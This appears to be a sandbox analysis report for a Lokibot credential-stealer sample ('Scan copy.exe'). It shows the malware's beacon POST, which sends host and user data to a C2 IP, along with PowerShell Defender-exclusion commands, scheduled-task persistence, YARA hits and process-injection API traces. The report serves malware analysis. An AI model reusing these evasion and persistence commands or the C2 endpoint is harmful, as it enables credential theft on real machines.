                            66192.168.2.75001294.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:16:14.991100073 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:16:15.111181974 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:16:16.432226896 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:16:16 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:0
                            Start time:03:14:09
                            Start date:28/11/2024
                            Path:C:\Users\user\Desktop\Scan copy.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\Scan copy.exe"
                            Imagebase:0x350000
                            File size:721'408 bytes
                            MD5 hash:8C4DA707092623F03586E61F56755840
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1295403096.00000000051B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1291320333.000000000277C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1291320333.000000000277C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1291320333.000000000277C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1291320333.000000000277C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1291320333.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            Reputation:low
                            Has exited:true

                            Target ID:3
                            Start time:03:14:10
                            Start date:28/11/2024
                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan copy.exe"
                            Imagebase:0xf10000
                            File size:433'152 bytes
                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:4
                            Start time:03:14:11
                            Start date:28/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:5
                            Start time:03:14:11
                            Start date:28/11/2024
                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vLQwEscoQr.exe"
                            Imagebase:0xf10000
                            File size:433'152 bytes
                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:6
                            Start time:03:14:11
                            Start date:28/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:7
                            Start time:03:14:11
                            Start date:28/11/2024
                            Path:C:\Windows\SysWOW64\schtasks.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp18EC.tmp"
                            Imagebase:0xb70000
                            File size:187'904 bytes
                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:8
                            Start time:03:14:11
                            Start date:28/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:10
                            Start time:03:14:11
                            Start date:28/11/2024
                            Path:C:\Users\user\Desktop\Scan copy.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\Scan copy.exe"
                            Imagebase:0x6d0000
                            File size:721'408 bytes
                            MD5 hash:8C4DA707092623F03586E61F56755840
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 0000000A.00000002.2502216653.0000000000D76000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:false

                            Target ID:13
                            Start time:03:14:13
                            Start date:28/11/2024
                            Path:C:\Users\user\AppData\Roaming\vLQwEscoQr.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Roaming\vLQwEscoQr.exe
                            Imagebase:0xbf0000
                            File size:721'408 bytes
                            MD5 hash:8C4DA707092623F03586E61F56755840
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 24%, ReversingLabs
                            Reputation:low
                            Has exited:true

                            Target ID:14
                            Start time:03:14:14
                            Start date:28/11/2024
                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Imagebase:0x7ff7fb730000
                            File size:496'640 bytes
                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:18
                            Start time:03:14:16
                            Start date:28/11/2024
                            Path:C:\Windows\SysWOW64\schtasks.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp2BF7.tmp"
                            Imagebase:0xb70000
                            File size:187'904 bytes
                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:19
                            Start time:03:14:16
                            Start date:28/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:20
                            Start time:03:14:17
                            Start date:28/11/2024
                            Path:C:\Users\user\AppData\Roaming\vLQwEscoQr.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Roaming\vLQwEscoQr.exe"
                            Imagebase:0xca0000
                            File size:721'408 bytes
                            MD5 hash:8C4DA707092623F03586E61F56755840
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                            • Rule: Loki_1, Description: Loki Payload, Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                            Has exited:true

                            Reset < >

                              Execution Graph

                              Execution Coverage:12.3%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:1.6%
                              Total number of Nodes:188
                              Total number of Limit Nodes:15
                              execution_graph 33540 b4d560 33541 b4d5a6 33540->33541 33544 b4d740 33541->33544 33547 b4d308 33544->33547 33548 b4d7a8 DuplicateHandle 33547->33548 33549 b4d693 33548->33549 33550 6c8dd10 33551 6c8de9b 33550->33551 33553 6c8dd36 33550->33553 33553->33551 33554 6c86550 33553->33554 33555 6c8df90 PostMessageW 33554->33555 33556 6c8dffc 33555->33556 33556->33553 33557 6c8a091 33558 6c8a09b 33557->33558 33559 6c8a107 33557->33559 33563 6c8cac8 33558->33563 33580 6c8cb10 33558->33580 33598 6c8cabb 33558->33598 33564 6c8cae2 33563->33564 33565 6c8cb06 33564->33565 33615 6c8d68c 33564->33615 33620 6c8d80a 33564->33620 33625 6c8d4e9 33564->33625 33630 6c8d494 33564->33630 33637 6c8cf51 33564->33637 33641 6c8d710 33564->33641 33646 6c8d93f 33564->33646 33652 6c8d8f9 33564->33652 33656 6c8d359 33564->33656 33661 6c8d1c2 33564->33661 33665 6c8cf21 33564->33665 33670 6c8d341 33564->33670 33674 6c8d101 33564->33674 33679 6c8d16c 33564->33679 33565->33559 33581 6c8cae2 33580->33581 33582 6c8cb13 33580->33582 33583 6c8cb06 33581->33583 33584 6c8d4e9 2 API calls 33581->33584 33585 6c8d80a 2 API calls 33581->33585 33586 6c8d68c 2 API calls 33581->33586 33587 6c8d16c 2 API calls 33581->33587 33588 6c8d101 2 API calls 33581->33588 33589 6c8d341 2 API calls 33581->33589 33590 6c8cf21 2 API calls 33581->33590 33591 6c8d1c2 2 API calls 33581->33591 33592 6c8d359 2 API calls 33581->33592 33593 6c8d8f9 2 API calls 33581->33593 33594 6c8d93f 2 API calls 33581->33594 33595 6c8d710 2 API calls 33581->33595 33596 6c8cf51 2 API calls 33581->33596 33597 6c8d494 4 API calls 33581->33597 33582->33559 33583->33559 33584->33583 33585->33583 33586->33583 33587->33583 33588->33583 33589->33583 33590->33583 33591->33583 33592->33583 33593->33583 33594->33583 33595->33583 33596->33583 33597->33583 33599 6c8cae2 33598->33599 33600 6c8d4e9 2 API calls 33599->33600 33601 6c8d80a 2 API calls 33599->33601 33602 6c8d68c 2 API calls 33599->33602 33603 6c8d16c 2 API calls 33599->33603 33604 6c8d101 2 API calls 33599->33604 33605 6c8d341 2 API calls 33599->33605 33606 6c8cf21 2 API calls 33599->33606 33607 6c8d1c2 2 API calls 33599->33607 33608 6c8d359 2 API calls 33599->33608 33609 6c8d8f9 2 API calls 33599->33609 33610 6c8d93f 2 API calls 33599->33610 33611 6c8d710 2 API calls 33599->33611 33612 6c8cb06 33599->33612 33613 6c8cf51 2 API calls 33599->33613 33614 6c8d494 4 API calls 33599->33614 33600->33612 33601->33612 33602->33612 33603->33612 33604->33612 33605->33612 33606->33612 33607->33612 33608->33612 33609->33612 33610->33612 33611->33612 33612->33559 33613->33612 33614->33612 33683 6c893e8 33615->33683 33687 6c893e3 33615->33687 33616 6c8d665 33616->33615 33617 6c8d95f 33616->33617 33621 6c8d073 33620->33621 33622 6c8d967 33621->33622 33691 6c89338 33621->33691 33695 6c89333 33621->33695 33622->33565 33626 6c8d252 33625->33626 33626->33625 33627 6c8d875 33626->33627 33699 6c899b8 33626->33699 33703 6c899b3 33626->33703 33633 6c893e8 Wow64SetThreadContext 33630->33633 33634 6c893e3 Wow64SetThreadContext 33630->33634 33631 6c8d073 33632 6c8d939 33631->33632 33635 6c89338 ResumeThread 33631->33635 33636 6c89333 ResumeThread 33631->33636 33632->33565 33633->33631 33634->33631 33635->33631 33636->33631 33707 6c89c3d 33637->33707 33711 6c89c40 33637->33711 33642 6c8d716 33641->33642 33715 6c89aa8 33642->33715 33719 6c89aa0 33642->33719 33643 6c8cfaf 33643->33565 33647 6c8d94c 33646->33647 33648 6c8d073 33646->33648 33649 6c8d967 33648->33649 33650 6c89338 ResumeThread 33648->33650 33651 6c89333 ResumeThread 33648->33651 33649->33565 33650->33648 33651->33648 33723 6c898f8 33652->33723 33727 6c898f3 33652->33727 33653 6c8d917 33657 6c8d073 33656->33657 33658 6c8d967 33657->33658 33659 6c89338 ResumeThread 33657->33659 33660 6c89333 ResumeThread 33657->33660 33658->33565 33659->33657 33660->33657 33663 6c899b8 WriteProcessMemory 33661->33663 33664 6c899b3 WriteProcessMemory 33661->33664 33662 6c8d1f0 33662->33565 33663->33662 33664->33662 33666 6c8cf24 33665->33666 33667 6c8cf87 33666->33667 33668 6c89c3d CreateProcessA 33666->33668 33669 6c89c40 CreateProcessA 33666->33669 33668->33667 33669->33667 33671 6c8d348 33670->33671 33672 6c899b8 WriteProcessMemory 33671->33672 33673 6c899b3 WriteProcessMemory 33671->33673 33672->33671 33673->33671 33675 6c8d717 33674->33675 33676 6c8cfaf 33675->33676 33677 6c89aa8 ReadProcessMemory 33675->33677 33678 6c89aa0 ReadProcessMemory 33675->33678 33676->33565 33677->33676 33678->33676 33680 6c8d34a 33679->33680 33681 6c899b8 WriteProcessMemory 33680->33681 33682 6c899b3 WriteProcessMemory 33680->33682 33681->33680 33682->33680 33684 6c8942d Wow64SetThreadContext 33683->33684 33686 6c89475 33684->33686 33686->33616 33688 6c8942d Wow64SetThreadContext 33687->33688 33690 6c89475 33688->33690 33690->33616 33692 6c89378 ResumeThread 33691->33692 33694 6c893a9 33692->33694 33694->33621 33696 6c89378 ResumeThread 33695->33696 33698 6c893a9 33696->33698 33698->33621 33700 6c89a00 WriteProcessMemory 33699->33700 33702 6c89a57 33700->33702 33702->33626 33704 6c89a00 WriteProcessMemory 33703->33704 33706 6c89a57 33704->33706 33706->33626 33708 6c89cc9 CreateProcessA 33707->33708 33710 6c89e8b 33708->33710 33710->33710 33712 6c89cc9 CreateProcessA 33711->33712 33714 6c89e8b 33712->33714 33716 6c89af3 ReadProcessMemory 33715->33716 33718 6c89b37 33716->33718 33718->33643 33720 6c89af3 ReadProcessMemory 33719->33720 33722 6c89b37 33720->33722 33722->33643 33724 6c89938 VirtualAllocEx 33723->33724 33726 6c89975 33724->33726 33726->33653 33728 6c89938 VirtualAllocEx 33727->33728 33730 6c89975 33728->33730 33730->33653 33532 b4b4b8 33533 b4b500 GetModuleHandleW 33532->33533 33534 b4b4fa 33532->33534 33535 b4b52d 33533->33535 33534->33533 33731 b44668 33732 b44684 33731->33732 33733 b446a4 33732->33733 33735 b44838 33732->33735 33736 b4485d 33735->33736 33740 b44944 33736->33740 33744 b44948 33736->33744 33742 b4496f 33740->33742 33741 b44a4c 33741->33741 33742->33741 33748 b44544 33742->33748 33745 b4496f 33744->33745 33746 b44a4c 33745->33746 33747 b44544 CreateActCtxA 33745->33747 33747->33746 33749 b45dd8 CreateActCtxA 33748->33749 33751 b45e9b 33749->33751 33536 5956818 33537 5956866 DrawTextExW 33536->33537 33539 59568be 33537->33539 33752 5956c48 33753 5956c82 33752->33753 33754 5956d13 33753->33754 33755 5956cfe 33753->33755 33757 59541c4 3 API calls 33754->33757 33760 59541c4 33755->33760 33759 5956d22 33757->33759 33762 59541cf 33760->33762 33761 5956d09 33762->33761 33765 5957657 33762->33765 33771 5957668 33762->33771 33777 595420c 33765->33777 33767 595768f 33767->33761 33769 59576b8 CreateIconFromResourceEx 33770 5957736 33769->33770 33770->33761 33772 595420c CreateIconFromResourceEx 33771->33772 33774 5957682 33771->33774 33772->33774 33773 595768f 33773->33761 33774->33773 33775 59576b8 CreateIconFromResourceEx 33774->33775 33776 5957736 33775->33776 33776->33761 33778 59576b8 CreateIconFromResourceEx 33777->33778 33779 5957682 33778->33779 33779->33767 33779->33769

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 294 59541c4-5956d68 297 5956d6e-5956d73 294->297 298 595724b-59572b4 294->298 297->298 299 5956d79-5956d96 297->299 306 59572bb-5957343 298->306 305 5956d9c-5956da0 299->305 299->306 307 5956da2-5956dac call 59541d4 305->307 308 5956daf-5956db3 305->308 350 595734e-59573ce 306->350 307->308 312 5956db5-5956dbf call 59541d4 308->312 313 5956dc2-5956dc9 308->313 312->313 315 5956ee4-5956ee9 313->315 316 5956dcf-5956dff 313->316 319 5956ef1-5956ef6 315->319 320 5956eeb-5956eef 315->320 327 59575ce-59575f4 316->327 329 5956e05-5956ed8 call 59541e0 * 2 316->329 324 5956f08-5956f38 call 59541ec * 3 319->324 320->319 323 5956ef8-5956efc 320->323 326 5956f02-5956f05 323->326 323->327 324->350 351 5956f3e-5956f41 324->351 326->324 342 5957604 327->342 343 59575f6-5957602 327->343 329->315 359 5956eda 329->359 347 5957607-595760c 342->347 343->347 366 59573d5-5957457 350->366 351->350 354 5956f47-5956f49 351->354 354->350 357 5956f4f-5956f84 354->357 357->366 367 5956f8a-5956f93 357->367 359->315 372 595745f-59574e1 366->372 368 59570f6-59570fa 367->368 369 5956f99-5956ff3 call 59541ec * 2 call 59541fc * 2 367->369 371 5957100-5957104 368->371 368->372 415 5957005 369->415 416 5956ff5-5956ffe 369->416 376 59574e9-5957516 371->376 377 595710a-5957110 371->377 372->376 388 595751d-595759d 376->388 380 5957114-5957149 377->380 381 5957112 377->381 386 5957150-5957156 380->386 381->386 386->388 389 595715c-5957164 386->389 449 59575a4-59575c6 388->449 394 5957166-595716a 389->394 395 595716b-595716d 389->395 394->395 400 59571cf-59571d5 395->400 401 595716f-5957193 395->401 409 59571f4-5957222 400->409 410 59571d7-59571f2 400->410 434 5957195-595719a 401->434 435 595719c-59571a0 401->435 426 595722a-5957236 409->426 410->426 418 5957009-595700b 415->418 416->418 422 5957000-5957003 416->422 424 5957012-5957016 418->424 425 595700d 418->425 422->418 431 5957024-595702a 424->431 432 5957018-595701f 424->432 425->424 426->449 450 595723c-5957248 426->450 438 5957034-5957039 431->438 439 595702c-5957032 431->439 437 59570c1-59570c5 432->437 441 59571ac-59571bd 434->441 435->327 442 59571a6-59571a9 435->442 447 59570e4-59570f0 437->447 448 59570c7-59570e1 437->448 445 595703f-5957045 438->445 439->445 484 59571bf call 5957657 441->484 485 59571bf call 5957668 441->485 442->441 453 5957047-5957049 445->453 454 595704b-5957050 445->454 447->368 447->369 448->447 449->327 460 5957052-5957064 453->460 454->460 457 59571c5-59571cd 457->426 465 5957066-595706c 460->465 466 595706e-5957073 460->466 467 5957079-5957080 465->467 466->467 471 5957086 467->471 472 5957082-5957084 467->472 475 595708b-5957096 471->475 472->475 476 5957098-595709b 475->476 477 59570ba 475->477 476->437 479 595709d-59570a3 476->479 477->437 480 59570a5-59570a8 479->480 481 59570aa-59570b3 479->481 480->477 480->481 481->437 483 59570b5-59570b8 481->483 483->437 483->477 484->457 485->457
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1295727036.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_5950000_Scan copy.jbxd
                              Similarity
                              • API ID:
                              • String ID: Hq$Hq$Hq$Hq$Hq
                              • API String ID: 0-3799487529
                              • Opcode ID: 322cfc221d787920958d1ceb010725a7291c0acd9d8ea3b389ec31e8b83570a9
                              • Instruction ID: 3a1066df23c695e4809dbdce1e8454fcae612fc963d6ed557dca99f0e2e96fdb
                              • Opcode Fuzzy Hash: 322cfc221d787920958d1ceb010725a7291c0acd9d8ea3b389ec31e8b83570a9
                              • Instruction Fuzzy Hash: 2F327D30E002188FDB59DFA9C8547AEBBF2FFC8310F148469D80AAB295DB349D55CB95
                              Memory Dump Source
                              • Source File: 00000000.00000002.1295727036.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_5950000_Scan copy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9271f8332ee4708e2fb1d1ace8499ea9f2c6ef0ff729369a60b833fc9aa19e22
                              • Instruction ID: cbfc3fdc76a5d0b96df818dc985ec614c921ac56cd9a694e78e018709902532f
                              • Opcode Fuzzy Hash: 9271f8332ee4708e2fb1d1ace8499ea9f2c6ef0ff729369a60b833fc9aa19e22
                              • Instruction Fuzzy Hash: 2AC13931A002149FCF55CFA5C984B9DBBB2FF85320F1485A9D849AB255EB30AAA5CB50
                              Memory Dump Source
                              • Source File: 00000000.00000002.1295727036.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_5950000_Scan copy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bdfadaf52a8474c354d92312ff0eab2e58e8c7478ba1abd5c7428fe178e3e132
                              • Instruction ID: c5a0c402373de63344c703b4deaeeffb23b16f0dd95be1d893197db2137e7714
                              • Opcode Fuzzy Hash: bdfadaf52a8474c354d92312ff0eab2e58e8c7478ba1abd5c7428fe178e3e132
                              • Instruction Fuzzy Hash: 09A104B0D05228CFDB14CFA6D844BEEBBB6FF89320F009569D90AA7245DB381995CF40
                              Memory Dump Source
                              • Source File: 00000000.00000002.1295727036.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_5950000_Scan copy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 99d1eace9878a202510baf37253b8fb6d952ebe7595bc91a8d20146dd705f699
                              • Instruction ID: f1053a0f3e0be6d49a7bcab1dece9c053d71590e2e6bab7ebac50d5d51425d9b
                              • Opcode Fuzzy Hash: 99d1eace9878a202510baf37253b8fb6d952ebe7595bc91a8d20146dd705f699
                              • Instruction Fuzzy Hash: D4A105B0D05228CFDB14CFA5D844BEEBBB6FF89320F1095A9D90AA7245DB345A95CF40
                              Memory Dump Source
                              • Source File: 00000000.00000002.1290981809.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_b40000_Scan copy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 58b53b7c0abd3b92e734f3a35b9ed7b4569f011dce57f4e5697dbf4320ab0d49
                              • Instruction ID: e70cbd0be1e16d0b4fe3541806018c5ef451aa7f2354e42c2464104128379436
